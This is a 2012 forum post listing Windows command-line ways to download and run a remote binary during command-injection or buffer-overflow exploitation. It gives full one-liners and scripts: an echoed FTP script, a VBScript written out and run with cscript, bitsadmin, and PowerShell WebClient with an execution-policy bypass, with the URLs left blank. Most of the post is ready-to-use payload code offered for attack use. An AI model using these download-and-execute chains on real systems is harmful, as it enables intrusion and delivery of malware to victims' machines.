denjacker Posted January 8, 2012 Report Posted January 8, 2012 In this post I am just highlighting some of the ways that I know of where we can download and execute code via the commandline which could be used in command injection vulnerabilities or exploiting buffer overflows using the classic ret-to-libc method. Most of you would most probably know these methods but I thought I’d post it anyway for my own reference.FTP methodFTP can be used to download a binary and then get executed with the start command. The downside to this method is that we’ll need to have a FTP server hosting the binary file. Nevertheless the command string length can be reasonably small.Here the ftp commands which are first echoed to create a script, then run the script by ftp.exe to download the binary and finally executing the /messbox.exequitcmd.exe /c "@echo open>script.txt&@echo binary>>script.txt&@echo get /messbox.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start messbox.exe"We can make the command string smaller by using o for open and b for binary. Also our script file can also be represented as a single character.WSH methodWindows Scripting Host can also be used to download and execute code. For this we again need to echo out the scripting code to a file and then run our script by cscript.exe.strFileURL = ""strHDLocation = "mess.exe"Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") "GET", strFileURL, falseobjXMLHTTP.send()If objXMLHTTP.Status = 200 ThenSet objADOStream = CreateObject("ADODB.Stream")objADOStream.OpenobjADOStream.Type = 1objADOStream.Write objXMLHTTP.ResponseBodyobjADOStream.Position = 0 objADOStream.SaveToFile strHDLocationobjADOStream.CloseSet objADOStream = NothingEnd ifSet objXMLHTTP = NothingSet objShell = CreateObject("WScript.Shell")objShell.Exec("mess.exe")Below is the code that is chained up and then using cscript.exe to run our script.cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs&@echo "GET","",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLHTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFile "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objADOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=Nothing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs"BITSadmin methodWindows 7 comes with a console tool called bitsadmin.exe which can be used to download and upload files. The cool thing about bitsadmin is that it suspends the transfer if a network connection is lost. After reconnection the transfer continues where it left off and executes our code.cmd.exe /c "bitsadmin /transfer myjob /download /priority high c:\mess.exe&start mess.exe"PowerShell methodPowershell is a scripting language which comes as standard in Windows 7. Below is a script which downloads and executes mess.exe.$down = New-Object System.Net.WebClient$url = '';$file = 'mess.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application$exec.shellexecute($file);We can echo this script to a file and then run the script using Powershell with the “bypass” parameter as by default the Powershell policy is set to “restricted”.powershell.exe -executionpolicy bypass -file poc.ps1Another elegant way to run our code without any scripts is by chaining our code in one line as shown belowPowerShell (New-Object System.Net.WebClient).DownloadFile('','mess.exe');Start-Process 'mess.exe'PowerShell (New-Object System.Net.WebClient).DownloadFile('','mess.exe');(New-Object -com Shell.Application).ShellExecute('mess.exe');References: : Quote